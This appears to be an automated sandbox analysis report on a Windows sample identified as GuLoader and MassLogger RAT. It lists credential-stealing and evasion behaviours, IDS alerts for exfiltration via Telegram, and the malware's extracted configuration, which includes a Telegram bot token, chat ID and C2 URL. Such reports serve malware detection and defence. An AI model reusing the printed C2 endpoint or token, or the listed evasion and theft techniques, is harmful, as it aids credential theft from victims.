Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
m0CZ8H4jfl.exe

Overview

General Information

Sample name:m0CZ8H4jfl.exe
renamed because original name is a hash value
Original sample name:d279cafd050cd071af764df4cc856e9e188ce0c920d13429a3b33129c7e4cee2.exe
Analysis ID:1587963
MD5:ad29d6168abbec988896c57d4d25e2ed
SHA1:469b06a2d18997abeb8829bd6e495cdfee811270
SHA256:d279cafd050cd071af764df4cc856e9e188ce0c920d13429a3b33129c7e4cee2
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • m0CZ8H4jfl.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\m0CZ8H4jfl.exe" MD5: AD29D6168ABBEC988896C57D4D25E2ED)
    • m0CZ8H4jfl.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\m0CZ8H4jfl.exe" MD5: AD29D6168ABBEC988896C57D4D25E2ED)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1793597999.0000000004978000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.2635144470.0000000003638000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:56:32.177767+010020577441Malware Command and Control Activity Detected192.168.2.949978149.154.167.220443TCP
            2025-01-10T19:56:33.861648+010020577441Malware Command and Control Activity Detected192.168.2.949980149.154.167.220443TCP
            2025-01-10T19:56:35.693207+010020577441Malware Command and Control Activity Detected192.168.2.949982149.154.167.220443TCP
            2025-01-10T19:56:37.490510+010020577441Malware Command and Control Activity Detected192.168.2.949984149.154.167.220443TCP
            2025-01-10T19:56:39.489661+010020577441Malware Command and Control Activity Detected192.168.2.949986149.154.167.220443TCP
            2025-01-10T19:56:41.456118+010020577441Malware Command and Control Activity Detected192.168.2.949988149.154.167.220443TCP
            2025-01-10T19:56:43.133611+010020577441Malware Command and Control Activity Detected192.168.2.949990149.154.167.220443TCP
            2025-01-10T19:56:44.714361+010020577441Malware Command and Control Activity Detected192.168.2.949992149.154.167.220443TCP
            2025-01-10T19:56:46.560662+010020577441Malware Command and Control Activity Detected192.168.2.949994149.154.167.220443TCP
            2025-01-10T19:56:48.242610+010020577441Malware Command and Control Activity Detected192.168.2.949996149.154.167.220443TCP
            2025-01-10T19:56:50.101630+010020577441Malware Command and Control Activity Detected192.168.2.949998149.154.167.220443TCP
            2025-01-10T19:56:52.036258+010020577441Malware Command and Control Activity Detected192.168.2.950000149.154.167.220443TCP
            2025-01-10T19:56:53.769670+010020577441Malware Command and Control Activity Detected192.168.2.950002149.154.167.220443TCP
            2025-01-10T19:56:55.394028+010020577441Malware Command and Control Activity Detected192.168.2.950004149.154.167.220443TCP
            2025-01-10T19:56:57.036409+010020577441Malware Command and Control Activity Detected192.168.2.950006149.154.167.220443TCP
            2025-01-10T19:56:58.782032+010020577441Malware Command and Control Activity Detected192.168.2.950008149.154.167.220443TCP
            2025-01-10T19:57:00.408259+010020577441Malware Command and Control Activity Detected192.168.2.950010149.154.167.220443TCP
            2025-01-10T19:57:02.211258+010020577441Malware Command and Control Activity Detected192.168.2.950012149.154.167.220443TCP
            2025-01-10T19:57:03.848515+010020577441Malware Command and Control Activity Detected192.168.2.950014149.154.167.220443TCP
            2025-01-10T19:57:05.506662+010020577441Malware Command and Control Activity Detected192.168.2.950016149.154.167.220443TCP
            2025-01-10T19:57:07.300338+010020577441Malware Command and Control Activity Detected192.168.2.950018149.154.167.220443TCP
            2025-01-10T19:57:09.117249+010020577441Malware Command and Control Activity Detected192.168.2.950020149.154.167.220443TCP
            2025-01-10T19:57:10.850360+010020577441Malware Command and Control Activity Detected192.168.2.950022149.154.167.220443TCP
            2025-01-10T19:57:12.700886+010020577441Malware Command and Control Activity Detected192.168.2.950024149.154.167.220443TCP
            2025-01-10T19:57:14.362942+010020577441Malware Command and Control Activity Detected192.168.2.950026149.154.167.220443TCP
            2025-01-10T19:57:16.226507+010020577441Malware Command and Control Activity Detected192.168.2.950028149.154.167.220443TCP
            2025-01-10T19:57:17.839667+010020577441Malware Command and Control Activity Detected192.168.2.950030149.154.167.220443TCP
            2025-01-10T19:57:19.456246+010020577441Malware Command and Control Activity Detected192.168.2.950032149.154.167.220443TCP
            2025-01-10T19:57:21.448036+010020577441Malware Command and Control Activity Detected192.168.2.950034149.154.167.220443TCP
            2025-01-10T19:57:23.378003+010020577441Malware Command and Control Activity Detected192.168.2.950036149.154.167.220443TCP
            2025-01-10T19:57:25.113171+010020577441Malware Command and Control Activity Detected192.168.2.950038149.154.167.220443TCP
            2025-01-10T19:57:26.997515+010020577441Malware Command and Control Activity Detected192.168.2.950040149.154.167.220443TCP
            2025-01-10T19:57:29.619187+010020577441Malware Command and Control Activity Detected192.168.2.950042149.154.167.220443TCP
            2025-01-10T19:57:31.750008+010020577441Malware Command and Control Activity Detected192.168.2.950044149.154.167.220443TCP
            2025-01-10T19:57:33.598481+010020577441Malware Command and Control Activity Detected192.168.2.950046149.154.167.220443TCP
            2025-01-10T19:57:39.793053+010020577441Malware Command and Control Activity Detected192.168.2.950048149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:56:23.891367+010028032742Potentially Bad Traffic192.168.2.949975193.122.6.16880TCP
            2025-01-10T19:56:30.891377+010028032742Potentially Bad Traffic192.168.2.949975193.122.6.16880TCP
            2025-01-10T19:56:33.032027+010028032742Potentially Bad Traffic192.168.2.949979193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:56:18.646039+010028032702Potentially Bad Traffic192.168.2.949973142.250.185.110443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T19:56:31.807597+010018100081Potentially Bad Traffic192.168.2.949978149.154.167.220443TCP
            2025-01-10T19:56:33.618945+010018100081Potentially Bad Traffic192.168.2.949980149.154.167.220443TCP
            2025-01-10T19:56:35.330479+010018100081Potentially Bad Traffic192.168.2.949982149.154.167.220443TCP
            2025-01-10T19:56:36.964352+010018100081Potentially Bad Traffic192.168.2.949984149.154.167.220443TCP
            2025-01-10T19:56:39.028995+010018100081Potentially Bad Traffic192.168.2.949986149.154.167.220443TCP
            2025-01-10T19:56:40.972524+010018100081Potentially Bad Traffic192.168.2.949988149.154.167.220443TCP
            2025-01-10T19:56:42.787510+010018100081Potentially Bad Traffic192.168.2.949990149.154.167.220443TCP
            2025-01-10T19:56:44.379360+010018100081Potentially Bad Traffic192.168.2.949992149.154.167.220443TCP
            2025-01-10T19:56:46.219496+010018100081Potentially Bad Traffic192.168.2.949994149.154.167.220443TCP
            2025-01-10T19:56:47.844249+010018100081Potentially Bad Traffic192.168.2.949996149.154.167.220443TCP
            2025-01-10T19:56:49.523005+010018100081Potentially Bad Traffic192.168.2.949998149.154.167.220443TCP
            2025-01-10T19:56:51.474015+010018100081Potentially Bad Traffic192.168.2.950000149.154.167.220443TCP
            2025-01-10T19:56:53.341257+010018100081Potentially Bad Traffic192.168.2.950002149.154.167.220443TCP
            2025-01-10T19:56:55.067585+010018100081Potentially Bad Traffic192.168.2.950004149.154.167.220443TCP
            2025-01-10T19:56:56.718469+010018100081Potentially Bad Traffic192.168.2.950006149.154.167.220443TCP
            2025-01-10T19:56:58.352507+010018100081Potentially Bad Traffic192.168.2.950008149.154.167.220443TCP
            2025-01-10T19:57:00.088414+010018100081Potentially Bad Traffic192.168.2.950010149.154.167.220443TCP
            2025-01-10T19:57:01.883437+010018100081Potentially Bad Traffic192.168.2.950012149.154.167.220443TCP
            2025-01-10T19:57:03.527252+010018100081Potentially Bad Traffic192.168.2.950014149.154.167.220443TCP
            2025-01-10T19:57:05.151965+010018100081Potentially Bad Traffic192.168.2.950016149.154.167.220443TCP
            2025-01-10T19:57:06.936842+010018100081Potentially Bad Traffic192.168.2.950018149.154.167.220443TCP
            2025-01-10T19:57:08.567100+010018100081Potentially Bad Traffic192.168.2.950020149.154.167.220443TCP
            2025-01-10T19:57:10.433174+010018100081Potentially Bad Traffic192.168.2.950022149.154.167.220443TCP
            2025-01-10T19:57:12.362356+010018100081Potentially Bad Traffic192.168.2.950024149.154.167.220443TCP
            2025-01-10T19:57:14.069016+010018100081Potentially Bad Traffic192.168.2.950026149.154.167.220443TCP
            2025-01-10T19:57:15.709271+010018100081Potentially Bad Traffic192.168.2.950028149.154.167.220443TCP
            2025-01-10T19:57:17.521702+010018100081Potentially Bad Traffic192.168.2.950030149.154.167.220443TCP
            2025-01-10T19:57:19.212304+010018100081Potentially Bad Traffic192.168.2.950032149.154.167.220443TCP
            2025-01-10T19:57:20.936355+010018100081Potentially Bad Traffic192.168.2.950034149.154.167.220443TCP
            2025-01-10T19:57:23.096862+010018100081Potentially Bad Traffic192.168.2.950036149.154.167.220443TCP
            2025-01-10T19:57:24.780435+010018100081Potentially Bad Traffic192.168.2.950038149.154.167.220443TCP
            2025-01-10T19:57:26.774780+010018100081Potentially Bad Traffic192.168.2.950040149.154.167.220443TCP
            2025-01-10T19:57:29.270759+010018100081Potentially Bad Traffic192.168.2.950042149.154.167.220443TCP
            2025-01-10T19:57:31.445917+010018100081Potentially Bad Traffic192.168.2.950044149.154.167.220443TCP
            2025-01-10T19:57:33.309516+010018100081Potentially Bad Traffic192.168.2.950046149.154.167.220443TCP
            2025-01-10T19:57:39.436070+010018100081Potentially Bad Traffic192.168.2.950048149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: m0CZ8H4jfl.exe.7628.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: m0CZ8H4jfl.exeVirustotal: Detection: 72%Perma Link
            Source: m0CZ8H4jfl.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_3474D1EC CryptUnprotectData,3_2_3474D1EC
            Source: m0CZ8H4jfl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49977 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.9:49973 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49978 version: TLS 1.2
            Source: m0CZ8H4jfl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,3_2_00405846
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_004027FB FindFirstFileW,3_2_004027FB
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_00406398 FindFirstFileW,FindClose,3_2_00406398
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 34741042h3_2_34740C28
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 34740671h3_2_347403AF
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 34741042h3_2_34740C1B
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 34741042h3_2_34740F6F
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB882Dh3_2_36AB8650
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB91B7h3_2_36AB8650
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then push 00000000h3_2_36ABBDF0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB6610h3_2_36AB6368
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB3968h3_2_36AB36C0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB30B8h3_2_36AB2E10
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB5908h3_2_36AB5660
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB1250h3_2_36AB0FA8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB6A68h3_2_36AB67C0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB61B8h3_2_36AB5F10
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB4218h3_2_36AB3F70
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB1F58h3_2_36AB1CB0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB7770h3_2_36AB74C8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB16A8h3_2_36AB1400
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB6EC0h3_2_36AB6C18
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB5058h3_2_36AB4DB0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB2808h3_2_36AB2560
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB5D60h3_2_36AB5AB8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB54B0h3_2_36AB5208
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB3510h3_2_36AB3268
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB4670h3_2_36AB43C8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB3DC0h3_2_36AB3B18
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_36AB7B4F
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB4ACAh3_2_36AB4820
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB7318h3_2_36AB7070
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB1B00h3_2_36AB1858
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB2C60h3_2_36AB29B8
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then jmp 36AB23B0h3_2_36AB2108
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 4x nop then push 00000000h3_2_37AFE7C8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49984 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49984 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49982 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49982 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50046 -> 149.154.167.220:443
